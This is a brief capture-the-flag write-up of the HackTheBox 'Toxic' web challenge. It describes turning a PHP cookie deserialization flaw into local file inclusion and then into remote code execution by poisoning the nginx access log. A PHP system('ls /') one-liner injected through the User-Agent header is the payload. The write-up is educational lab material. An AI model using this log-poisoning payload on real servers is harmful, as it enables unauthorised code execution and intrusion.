We covered local file inclusion that is a web application vulenrability. We also covered the concept of log file posioning and how we can move from LFI to log file posioning. We used the lab material from HackTheBox Toxic web challenge to demonstrate this on an Ngnix web server serving cookies in base64 format.. This was part of HackTheBox Toxic Web Challenge.
Humanity has exploited our allies, the dart frogs, for far too long, take back the freedom of our lovely poisonous friends. Malicious input is out of the question when dart frogs meet industrialisation. 🐸
In the challenge we had a source code written in PHP where the user cookie called PHPSESSID is being created using setcookie() and the cookie’s value is set to the base64 encoding of some serialized object called $page of type PageModel and at the same time it has a property $file set to “/www/index.html.
An If statement checks whether PHPSESSID cookie exists and if it does its value is decoded using base64_decode() and then deserialized back to a PHP object value.
If we are able to change the $file property to point to the flag location we will have exploited a local file inclusion vulnerability. To learn the flag location we need to elevate from LFI into remote code execution which can be achieved by posioning the user agent entry in the log file located at /var/log/nginx/access.log.
We can use a simple PHP one liner php<? system(“ls /”); ?> to list the contents of the current directory. This command can be supplemented in the user agent field while intecepting the GET request using the Burp Suite. This retrieved the flag 🚩 for us.